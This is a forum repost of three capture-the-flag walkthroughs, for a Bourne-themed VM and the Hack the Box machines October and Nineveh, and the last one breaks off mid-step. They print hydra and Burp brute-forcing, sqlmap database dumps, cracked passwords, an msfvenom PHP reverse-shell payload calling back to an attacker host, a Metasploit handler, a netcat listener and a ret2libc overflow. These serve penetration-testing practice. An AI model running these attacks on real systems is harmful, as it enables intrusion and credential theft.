05-14-2020, 09:04 AM
| 0 | 0 | ||
[To see content please register here]
.VM Difficulty Level: Beginner/Intermediate
Penetrating Methodology
- Network Scanning (Nmap, netdiscover)
- Information gathering:
- Abusing web browser for the 1st flag
- Generate dictionary (Cewl)
- FTP brute-force (hydra)
- FTP login for the 2nd flag
- SQL injection for the 3rd flag
- Blackmarket login for the 4th flag
- Squirrel mail login for the 5th flag
- Get cipher mail from inside Inbox. Draft
- Decipher the mail and reach to backdoor.php
- Upload backdoor shell
- Netcat session for the 6th flag
- Import python one-liner for proper TTY shell
- Sudo Rights Privilege Escalation
- Get Root access and capture the flag.
Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own).
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-hq1yBhKA_cs/WzcrDIDYoaI/AAAAAAAAXvA/2AbmGEuGwMwC9uc1Q1jrr3TQuas-0xGnQCEwYBhgL/s1600/1.png?w=687&ssl=1)
Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.
nmap -A 192.168.1.104
1
nmap -A 192.168.1.104
As you can observe it has dumped a lot of details related to open ports and services running through them.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-fZNSg24zqw8/WzcrGIGRJzI/AAAAAAAAXvQ/WgmJT296PoUfzVszKAYDHczsB4Isiaz2wCEwYBhgL/s1600/2.png?w=687&ssl=1)
Knowing port 80 is open in the victim’s network I preferred to explore his IP in a browser. It put-up a Blackmarket login page but we don’t have credential yet, therefore, we like to view its source code for getting a clue.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ec3G7UJlTTE/WzcrHudS1GI/AAAAAAAAXvQ/lnBwDX9g3hsKPXvSvRts08d33sFfsbXVQCEwYBhgL/s1600/3.png?w=687&ssl=1)
BOOOMMM!! Luckily I found the 1st flag from its source code which was in base64.
flag1 {Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-FKiy1W89vDc/WzcrI1ag31I/AAAAAAAAXvM/x4RraHFDtFswbRpGkq8WBMlvsfOxXNIAwCEwYBhgL/s1600/4.png?w=687&ssl=1)
Since the 1st flag was the base64 encoded so we try to decode it with help of the following syntax.
Syntax: echo ‘base64 encoded text’ | base64 -d
WoW!! It sounds CIA Operation Treadstone…………………
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-n6sJ4BBC11E/WzcrJGk81sI/AAAAAAAAXvU/ldJ9HnCWOAYlRU3t9MJa1F-R3LsjMh00wCEwYBhgL/s1600/5.png?w=687&ssl=1)
With help of Google I found this
[To see content please register here]
and after reading the whole article it becomes clear to me what CIA Operation Treadstone is all about and why flag 1 has held it secretly. Might be Black-market login credential could be extracted from here, therefore I decide to generate a dictionary with help of ‘Jason Bourne’ movie’s character. By executing the following command, we generated a wordlist for username and password dictionary and save it as dict.txt.cewl
[To see content please register here]
-d 2 -w /root/Desktop/dict.txt1
cewl
[To see content please register here]
-d 2 -w /root/Desktop/dict.txt![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-s9wxxBSh2YU/WzcrJReAyDI/AAAAAAAAXvM/4aw1ufmRfzYZcm4zpi68e9wy1MkJS7zpACEwYBhgL/s1600/6.png?w=687&ssl=1)
As we knew port 21 is open FTP, therefore, we use the above dictionary for FTP brute-force attack with help of hydra.
hydra -L dict.txt -P dict.txt 192.168.1.104 ftp
1
hydra -L dict.txt -P dict.txt 192.168.1.104 ftp
Successfully found FTP-login user: nicky password: CIA
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-sOx8Mi-uv9I/WzcrJXkfKdI/AAAAAAAAXvQ/n59w_lWQJKouiGVDDVnqk5J098qL9sJjgCEwYBhgL/s1600/7.png?w=687&ssl=1)
Then with help above credential, we logged into FTP and enumerate IMP.txt from inside /IMPFiles and download it with the help of the following command.
ftp 192.168.1.104
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
get IMP.txt
1
2
3
4
5
6
7
ftp 192.168.1.104
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
get IMP.txt
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-UK-Qs87Jnmw/WzcrJ0VyRQI/AAAAAAAAXvY/sQmczx3pO1UGL7eFXLHWBq7zO1nqs1aSwCEwYBhgL/s1600/8.png?w=687&ssl=1)
With help of cat command, we open the IMP.txt file and found flag2 from inside it. Here also we read the given message and analysis the given hint “CIA blackmarket Vehicle workshop”.
cat IMP.txt
1
cat IMP.txt
flag2 {Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vW0j841aMnE/WzcrKHOuShI/AAAAAAAAXvU/WbCC9ZcPe7AKH5V2gvwM7ODJ0Sge7i7UgCEwYBhgL/s1600/9.png?w=687&ssl=1)
Looking at above hint I focus on “Vehicle workshop” and start examining the web browser for every possible directory having Vehicle/workshop and Unfortunately I retrieved following web page when tried
[To see content please register here]
1
[To see content please register here]
It was a dashboard of the Black-Market Auto Workshop.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-NGC1k2tG-Ao/WzcrDfI7NcI/AAAAAAAAXvY/bdw0RV-xsgUgExSXTFBVxlhtA_GDQSgUgCEwYBhgL/s1600/10.png?w=687&ssl=1)
After examining the whole dashboard we check-out the Spare Parts and observe its web page and URL. So we decide to use SQLMAP against for SQL injection.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ccipPlDegKE/WzcrDT7ILFI/AAAAAAAAXvM/jAE29bWS7tAAanLKrGPdDU3ndeC41fiKgCEwYBhgL/s1600/11.png?w=687&ssl=1)
Then execute the following command for fetching its database name with help of sqlmap.
sqlmap -u
[To see content please register here]
--dbs --batch1
sqlmap -u
[To see content please register here]
--dbs --batch![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-HX4dfotEsQk/WzcrD8s5GHI/AAAAAAAAXvY/dt31SAtbA1keRW2ePIn0WvyvIcHmuCuKgCEwYBhgL/s1600/12.png?w=687&ssl=1)
Here I found some database names and as per my consideration, it should be blackmarket therefore without wasting time I step ahead for fetching tables from inside it.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-uGTn8aYmMZM/WzcrEIqMFeI/AAAAAAAAXvQ/_U0hSf5eZOgOn8fVDPODb1AjTGWMHIz3wCEwYBhgL/s1600/13.png?w=687&ssl=1)
sqlmap -u
[To see content please register here]
-D BlackMarket --dump-all --batch1
sqlmap -u
[To see content please register here]
-D BlackMarket --dump-all --batchHere I found a table “flag” and capture the 3rd flag from here.
Flag3 Find Jason Bourne Email access.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-mIcETt6_CUo/WzcrELXhSgI/AAAAAAAAXvI/tZhapJA_7OIdXsIBRqFJ1980QlNQKS8egCEwYBhgL/s1600/14.png?w=687&ssl=1)
Then we have fetched table “user” and found usernames with their hash passwords.
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-gguhGsHXrrs/WzcrEl_5pmI/AAAAAAAAXvU/PuyaMCbCh3AXzaQQHQIYJRhbeOch33MDACEwYBhgL/s1600/15.png?w=687&ssl=1)
With help of the online MD-5 decrypting tool, we decode above-enumerated hashes and found following.
Username: admin |password: cf18233438b9e88937ea0176f1311885 MD5: BigBossCIA
Username: user |password: 0d8d5cd06832b29560745fe4e1b941cf md5 (md5($pass)) : user
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YV325MqoLk4/WzcrE1HMIlI/AAAAAAAAXvI/yn13enJiiHULtZbU_k3b8WTuxXIvJphdwCEwYBhgL/s1600/16.png?w=687&ssl=1)
Then again we explore target IP in the browser and enter following credential for login.
admin
BigBossCIA
1
2
admin
BigBossCIA
It put-up a pop with flag 4 along with a message as shown.
flag4{bm90aGluZyBpcyBoZXJl}
Jason Bourne Email access ?????
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-jr5z3mNVtbo/WzcrFMtGWhI/AAAAAAAAXvE/MT-rpy6cnWUF1xOmlT176lXA3R22PocqgCEwYBhgL/s1600/17.png?w=687&ssl=1)
From Inside customers, I got email Id [email protected] of user Jason Bourne.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-pE6CCswgfdE/WzcrFOwTbsI/AAAAAAAAXvQ/0E8phcgpA2AAwgQy3iv4miYc5nPf29f5gCEwYBhgL/s1600/18.png?w=687&ssl=1)
At this stage I felt to use Dirb for a directory brute-force attack, here we notice /squirrelmail/ and for sure we will be going to get something from here.
![[Image: 19.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-7znsPB6s6w4/WzcrFl7nB5I/AAAAAAAAXvY/mgO7ydJTcbkuYAafZ18H8B-Zdb9W5IaMACEwYBhgL/s1600/19.1.png?w=687&ssl=1)
So we explore following URL
[To see content please register here]
and enter given below credential as described in the 4th flag (Jason Bourne Email access ?????)Username: [email protected]
Password: ?????
It gives the following mailbox as shown and I start further enumeration.
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-xlqj3fSsKf8/WzcrF1UD9cI/AAAAAAAAXvU/WSIcFP5_NFYB3QXyUcs2wFoVgw9KcHpQQCEwYBhgL/s1600/19.png?w=687&ssl=1)
Then while inspecting INBOX. Drafts I found the 5th flag from inside IMPORTANT MESSAGE mail.
Flag5 {RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
And after reading this we find some encoded text which needs to be decoded.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-YdtJp9I3Nxo/WzcrGctT5LI/AAAAAAAAXvE/QazLKHabtps-VYrA-3uYfqA7U_3s67IUQCEwYBhgL/s1600/20.png?w=687&ssl=1)
Then I decoded the above text as shown and after reading it, I concluded that there should be a “passpass.jpg” under a directory /kgbbackdoor inside Blackmarket workshop which will take us to the actual backdoor.
![[Image: 21.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vtz_AXID4Uo/WzcrGmddYHI/AAAAAAAAXvY/CIihSipHA3Qnn9Pr3ktco-mQH5xZcVsNQCEwYBhgL/s1600/21.png?w=687&ssl=1)
So without wasting time I look for the above-said path.
[To see content please register here]
1
[To see content please register here]
hhheheyy!!! This image must be hiding something inside, let’s download it
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-jfZB0M_CFNg/WzcrGxINo4I/AAAAAAAAXvI/OmJFhfjNR4cuEqGk43hXbtameNFOMGxcQCEwYBhgL/s1600/22.png?w=687&ssl=1)
Then I use string tool and enter the following command to extract metadata from inside it.
strings PassPass.jpg
1
strings PassPass.jpg
Here we found something interesting.
Pass = 5215565757312090656
1
Pass = 5215565757312090656
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-tfLxUfkIgzE/WzcrG3OGfAI/AAAAAAAAXvY/-meiC_hizRsysRCnoTca5o_0bMrujC8MACEwYBhgL/s1600/24.png?w=687&ssl=1)
Since the above extract metadata “Pass” which could be the possible password, and we can use this for further approach, therefore, we try to decode it. As it was in decimal (5215565757312090656) format so first, we decode it into hex (4861696C4B474220) then decode it into ascii and obtained “HailKGB”
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-OaX_f5qrxFA/WzcrHKpLrLI/AAAAAAAAXvQ/pdqZhal98Ao3du3zc0qjdOVRpFz-W9AEgCEwYBhgL/s1600/25.png?w=687&ssl=1)
As slowly and gradually we are moving towards our goal as it getting more-and-more hectic for me. After penetrating more I reached following URL where you will found Page Not Found error message…….
[To see content please register here]
1
[To see content please register here]
BANG ON Dear, it is an illusion because at this page you will get a hidden login form as declared in the encrypted mail. Still, if you have any confusion, please read above decoded text message drop for Dimitri one more time, everything will be cleared to you.
![[Image: 28.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-aMf8g52t2kc/WzcrHUFqUVI/AAAAAAAAXvM/lV5VQ09mRYEEZwJJTVNzFzJesx2xWhJpQCEwYBhgL/s1600/28.png?w=687&ssl=1)
B0000MMM!!! Here we have access the backdoor about whom the sender has informed to Dimitri.
![[Image: 29.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-PGvZNkyHUAI/WzcrHtusfSI/AAAAAAAAXvQ/b0vWPLTSwRIbqutQH7f1JOCukUTq8ow8gCEwYBhgL/s1600/29.png?w=687&ssl=1)
Now let’s enter attacker IP: 192.168.1.107 and listening port 4444 and then start netcat listen in a new terminal to get victim’s reverse connection.
nc -lvp 4444
1
nc -lvp 4444
![[Image: 31.1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-fXR2DkPeSwo/WzcrH0JSfBI/AAAAAAAAXvM/R9hFtcdU3KwIrKmQg1M3g4hPMuXfPDUpgCEwYBhgL/s1600/31.1.png?w=687&ssl=1)
With help of netcat, we successfully spawn pty shell of victim’s VM machine then open flag.txt with help of cat command and found 6th the last flag of this VM. Now we need to get root access to finish this challenge.
cat flag.txt
flag6{Um9vdCB0aW1l}
cd /home
ls -al
cd .Mylife
ls -al
cat .Secret
1
2
3
4
5
cd /home
ls -al
cd .Mylife
ls -al
cat .Secret
while reading the message I notice something prodigious i.e. DimitriHateApple because the file is named as secret, therefore, I took DimitriHateApple as the password for user: Dimitri
![[Image: 31.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-feprku9JGsw/WzcrIG_jPQI/AAAAAAAAXvY/arO7hSq4n_4rPf3vQypDX5g4KdZIMYW6ACEwYBhgL/s1600/31.png?w=687&ssl=1)
Then I try to login with Dimitri and for that, I execute the following command to access proper terminal.
python -c 'import pty; pty.spawn("/bin/bash")'
su dimitri
DimitriHateApple
1
2
3
python -c 'import pty; pty.spawn("/bin/bash")'
su dimitri
DimitriHateApple
Great!!! We login successfully now let’s try privilege escalation for root access.
I was shocked when I checked sudo rights for user Dimitri because I notice ALL Privilege are allotted.
sudo -l
(ALL : ALL) ALL
sudo su
1
2
3
sudo -l
(ALL : ALL) ALL
sudo su
Yehhh!! We own root access.
![[Image: 32.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-hRT65DrRsc0/WzcrIddpnpI/AAAAAAAAXvI/Td4ADFScz_gFFLlSnZ4XI_c7CrqCa99XwCEwYBhgL/s1600/32.png?w=687&ssl=1)
cd /root
ls
cat THEEND.txt
1
2
3
cd /root
ls
cat THEEND.txt
HURRAYYYY!!!! We finished this challenge.
Happy Hacking
![[Image: 33.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-h77hhuDiKtw/WzcrIXoMeZI/AAAAAAAAXvU/AKpKXlWDFn0dzSjdl3iAaYrrivY1-JOSgCEwYBhgL/s1600/33.png?w=687&ssl=1)
Hello friends!! Today we are going to solve another CTF challenge “October” which is available online for those who want to increase their skill in penetration testing and black box testing. October is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.16 so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.16
1
nmap -sV 10.10.10.16
From given below image, you can observe we found port 22 and 80 are open on target system.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-LCgOnPbp9Kw/WzXnnp46QBI/AAAAAAAAXn0/up5hmTv62KU2OM7XFEBAErqqFh9f5VlqgCEwYBhgL/s1600/1.png?w=687&ssl=1)
As port 80 is running http server we open the target machine’s ip address in our browser, and find that it is running octobercms.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-zXzaxIlmmg4/WzXnrh5mbEI/AAAAAAAAXoE/htFeelFtC5QmIk8h1A9k0tHV9Yup6_bLQCEwYBhgL/s1600/2.png?w=687&ssl=1)
We go to the default admin login page for octobercms at
[To see content please register here]
.![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-qthhx8uIhsE/WzXnrBVG3qI/AAAAAAAAXoE/YINUvEeXEl0MH38nHKuSPypu4CL-tnXQACEwYBhgL/s1600/3.png?w=687&ssl=1)
We can login to this CMS with default credentials; Username: admin Password: admin
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-YCo5khE4wTc/WzXnrx-zPpI/AAAAAAAAXn8/ckwTAXZYWdkewTIfPzDokMZTWkMZPf9MwCEwYBhgL/s1600/4.png?w=687&ssl=1)
And we got the admin access to October CMS, Now to get reverse shell first rename your php payload to ‘.php5 ‘. We use msfvenom to create a php payload and save it as shell.php5.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw > shell.php5
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw > shell.php5
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-lpXDfMOvXDc/WzXnsJkqU2I/AAAAAAAAXoA/Kw7h8WCliNoDaWM040DevWaJPJ4_Zk24gCEwYBhgL/s1600/6.png?w=687&ssl=1)
After create the payload we setup our listener using metasploit.
msf > use exploit/multi/handler
msf > exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf > exploit(multi/handler) > set lhost 10.10.14.25
msf > exploit(multi/handler) > set lport 4444
msf > exploit(multi/handler) > run
1
2
3
4
5
msf > use exploit/multi/handler
msf > exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf > exploit(multi/handler) > set lhost 10.10.14.25
msf > exploit(multi/handler) > set lport 4444
msf > exploit(multi/handler) > run
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-qshuJcL5qLE/WzXnsTUWrHI/AAAAAAAAXoI/DQXEMFeLya4hkVMbN5hy_OL0JYlnU1rDwCEwYBhgL/s1600/7.png?w=687&ssl=1)
Now click on Media in the top toolbar, now upload your PHP reverse shell, and click on the public link which is on the right side.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/--Wns8uo1XX0/WzXnsolPpUI/AAAAAAAAXoI/v99dbkHK08sXCGRTYhMzOm30XXmyDhPYwCEwYBhgL/s1600/8.png?w=687&ssl=1)
As soon as we click on the link we get our revershell. We use sysinfo command to check the system information about the target machine.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-WDC0y_5H92s/WzXnsq-MzbI/AAAAAAAAXoI/7qvn28jd_scAczJdZY-dIMnJBTlF5xxegCEwYBhgL/s1600/9.png?w=687&ssl=1)
Now spawn a tty shell and try to find binaries in the system with suid bit set.
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
1
2
3
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/--AXQw1UyGTo/WzXnnwGdNbI/AAAAAAAAXn0/EXX0g_HxAYs5qAm_UWISC7TR2lDys7KVQCEwYBhgL/s1600/10.png?w=687&ssl=1)
We find a binary called ovrflw that has suid bit set. We download the file into our system using meterpreter.
meterpreter > download /usr/local/bin/ovrflw /root/Desktop
1
meterpreter > download /usr/local/bin/ovrflw /root/Desktop
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-mN3OTblzl_E/WzXnn72wBJI/AAAAAAAAXn0/2ukE0EVWSyonib_dpN1NLJ_tOBlsFSz2wCEwYBhgL/s1600/11.png?w=687&ssl=1)
We open the file in gdb and take a look at the assembly code. At line main+64 we find the strcpy function, As strcpy is vulnerable to buffer overflow we try to exploit it.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-AQIUscaWEuU/WzXnovIWIyI/AAAAAAAAXn4/OT5N_9O31ukMq8ZpitRDqTRidcgQSGzSgCEwYBhgL/s1600/12.png?w=687&ssl=1)
First we create a 150 bytes long string to find the EIP offset using patter_create script.
./pattern_create.rb -l 150
1
./pattern_create.rb -l 150
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-JIaR5Ki2VCA/WzXno_8-RII/AAAAAAAAXn8/056FQvfBsL0PmpYaMVTU8Aj4O8Kv_dDaACEwYBhgL/s1600/13.png?w=687&ssl=1)
We run the file in gdb along with the 150 byte character as the argument and find that the EIP register was overwritten with 0x64413764.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-57-0pjG9HBg/WzXno5fuX2I/AAAAAAAAXoA/8CGjzQMZ5PMnALJuWp-lXEjXO8favQTKgCEwYBhgL/s1600/14.png?w=687&ssl=1)
We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of 112. So we need to write 112 characters and then write the address of the instructions we want to be executed.
./pattern_offset.rb -q 64413764 -l 150
1
./pattern_offset.rb -q 64413764 -l 150
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-EvVywZdU8TA/WzXnpMB17YI/AAAAAAAAXoE/9Gw1LRw8-zk-8uEod7ld13uf4bBrjehlgCEwYBhgL/s1600/15.png?w=687&ssl=1)
Now when we try to insert shellcode into the buffer but we were unable to execute it because of DEP. It prevents code from being executed in the stack. Now we are going to do a ret2libc attack to execute a process already present in the process’ executable memory. We go into the target machine and find ASLR in enabled so we have to brute force the address. Now we find the address of system, exit and /bin/sh.
gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb75bd310, +9999999, "/bin/sh"
(gdb) x/s 0xb76dfbac
(gdb) p exit
1
2
3
4
5
6
7
gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb75bd310, +9999999, "/bin/sh"
(gdb) x/s 0xb76dfbac
(gdb) p exit
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-P8gqFFzOcd8/WzXnpvohJxI/AAAAAAAAXn4/Ewr6T_XEWWc7PnuHBHizshaXG1h8jfppgCEwYBhgL/s1600/16.png?w=687&ssl=1)
Now we create our exploit we brute force the address using bash because of ASLR. We align the address in this order: system>exit>/bin/sh. We get the root shell as soon as it matches our memory address.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-6ByyxwoZAF8/WzXnp4Au6NI/AAAAAAAAXoE/E_4lvirhoCYrJ1Ve_ec-PwW5Wa-2BmCOACEwYBhgL/s1600/17.png?w=687&ssl=1)
After getting the root shell, we move to /root directory and find a file called root.txt we open the file and find the first flag.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-tacWzyYHj_c/WzXnqk0xztI/AAAAAAAAXoE/TrXQCGgyvzYYGYaAAN6CGg_WA1X-jamTQCEwYBhgL/s1600/19.png?w=687&ssl=1)
After finding the first flag we go to /home/ directory, in home directory and find a directory called harry/. We go inside harry directory and find a file called user.txt, we open user.txt and find our final flag.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-NSdX4fqD-I8/WzXnrK8c2EI/AAAAAAAAXoI/Sz9uGtfsOxkkO-mZF_9CMPPPU_vxlofwQCEwYBhgL/s1600/20.png?w=687&ssl=1)
Today we are going to solve another CTF challenge “Nineveh” which is categories as retired lab presented by Hack the Box for making online penetration practices.
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Penetration Methodology
Scanning
- Open port and running services (Nmap)
- Enumerating Web Directories (Dirb)
- Brute force on PHPliteAdmin (Burp Suite)
- Spawning Shell (Metasploit)
- Get user.txt
- User.txt
Scanning
Since these labs are online accessible therefore they have static IP. The IP of Nineveh is 10.10.10.43 so let’s initiate with nmap port enumeration.
nmap -A 10.10.10.43
1
nmap -A 10.10.10.43
it enumerated port 80 and 443 are open.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Kw0zf_sGwVQ/WzM6uKXRW7I/AAAAAAAAXjE/4jHlHRZitQMNkQjtRPA76IytmKpAki0aACEwYBhgL/s1600/1.png?w=687&ssl=1)
We explored port 80 but didn’t observe any remarkable clue for next step.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-3X1hB90mnC8/WzM6wJJlLRI/AAAAAAAAXkg/7KXyXbOK03E9T1xjZuBOaf79zNDJcLwqACEwYBhgL/s1600/2.png?w=687&ssl=1)
Enumeration
So next, we use the dirb tool of Kali to enumerate the directories and found some important directories such as
[To see content please register here]
then went to the web browser to explore them.dirb
[To see content please register here]
/usr/share/wordlists/dirb/big.txt1
dirb
[To see content please register here]
/usr/share/wordlists/dirb/big.txt![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-XiHIwBiR390/WzM6xGEsukI/AAAAAAAAXkg/1XvXil9L2KgPuJDzwdWO1GGW5qVc0pL4QCEwYBhgL/s1600/3.png?w=687&ssl=1)
It put-up login page as shown here.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-vRk_n8E8yFc/WzM6xZQ0mhI/AAAAAAAAXkw/Gic81oyjGfwwh0__IUev4poCRKZMmSv6wCEwYBhgL/s1600/4.png?w=687&ssl=1)
So we try the random combination of username and password. While we have enter username: admin and Password: password it gave an error “Invalid Password” hence it was sure that the username must be the admin.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-c8yuwofXWjU/WzM6xsYtPJI/AAAAAAAAXko/vn6_OXf4Rvsd_ljbQlXuw9QsUvAbs1RagCEwYBhgL/s1600/5.png?w=687&ssl=1)
Then with help of burp suit, we made brute force attack and use the rockyou.txt file as password dictionary. Thus we obtain the correct combination for login.
Username: admin
Password: 1q2w3e4r5t
1
2
Username: admin
Password: 1q2w3e4r5t
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-esHvIAeQJNw/WzM6xqEuLKI/AAAAAAAAXks/i7ShXNK7Y-A3CFKlWAk1S6puyeoKfqyMgCEwYBhgL/s1600/6.png?w=687&ssl=1)
Used above credential for login and get into admin console as shown.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/--02xkpAsrE0/WzM6yBY4tEI/AAAAAAAAXkw/jevr2nZbVZ4iMgjKLzbegTWPidEJeLY2gCEwYBhgL/s1600/8.png?w=687&ssl=1)
At Notes tab we concluded that the given text of a file stored at someplace in the system entitled with ninevehNotes.txt.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-v7QFhos8yuM/WzM6yKFgL9I/AAAAAAAAXk0/owtwByv6oS8MXTRaAJ8-PdaxADl5hFInACEwYBhgL/s1600/9.png?w=687&ssl=1)
After that we also explored port 443 and observe the following web page. We also look at it view source but didn’t notice any further hint.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-4OCN4j6LKzE/WzM6utoa1UI/AAAAAAAAXkc/l3sefF8FYVEui8hJSNDjbVx7aC6-VuQNQCEwYBhgL/s1600/10.png?w=687&ssl=1)
Therefore again use dirb tool for directory brute force attack and observe the /db directory.
dirb
[To see content please register here]
/usr/share/wordlists/dirb/big.txt1
dirb
[To see content please register here]
/usr/share/wordlists/dirb/big.txt![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-QQt3-SWKgJA/WzM6uArG0NI/AAAAAAAAXkc/5bkZ1-_yNcMpUPbhd6t3KtPJxW4EAyqgACEwYBhgL/s1600/11.png?w=687&ssl=1)
Exploiting
For a second time, we explored the above-enumerated directory and observe login page for phpliteAdmin v1.9.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-9LlfJ9Er_00/WzM6utTQq-I/AAAAAAAAXk0/OEdgDfPwrVAhENrw_YxZYy9D2E6gsyMvQCEwYBhgL/s1600/12.png?w=687&ssl=1)
Again we lunch brute forced the password field on /db with burp suit and got the password: password123.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-lzGDkq0k4Xk/WzM6uqf0SvI/AAAAAAAAXkc/pdnlXioB8HU7h06ouxGQGAkxTrI2XSfwgCEwYBhgL/s1600/13.png?w=687&ssl=1)
By using password123 and we get inside the PHPLiteAdmin dashboard. Then with help of Google, we found the trick to exploit it after reading the description from exploit DB 24044.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/--0T2jGFpeFM/WzM6uxZyNII/AAAAAAAAXko/m---_vsYVGc9wLVulzd2f1CtazBUiulkACEwYBhgL/s1600/14.png?w=687&ssl=1)
After reading the description from exploit 24044 then we create a new database “ninevehNotes.txt.shell.php”
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-AoSp9WWKkF0/WzM6vClYIBI/AAAAAAAAXkk/yO95oaZ-2Do5MrzAdW0fybcmASKx_4wuwCEwYBhgL/s1600/15.png?w=687&ssl=1)
Here we have created a new table “Demo” and Add! Filed inside this.
